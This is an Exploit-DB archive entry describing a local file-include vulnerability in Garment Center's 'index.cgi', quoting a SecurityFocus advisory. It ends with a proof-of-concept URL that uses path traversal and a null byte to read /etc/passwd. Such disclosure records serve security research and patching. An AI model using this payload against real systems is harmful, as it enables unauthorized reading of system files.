Garment Center 'index.cgi' Local File Include Vulnerability

2008-01-14T00:00:00
ID EDB-ID:31025
Type exploitdb
Reporter Smasher
Modified 2008-01-14T00:00:00

Description

Garment Center 'index.cgi' Local File Include Vulnerability. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/27273/info

Garment Center is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this issue may allow an unauthorized user to view files and execute local scripts. 

http://www.example.com/index.cgi?page=../../../../../../../../etc/passwd%00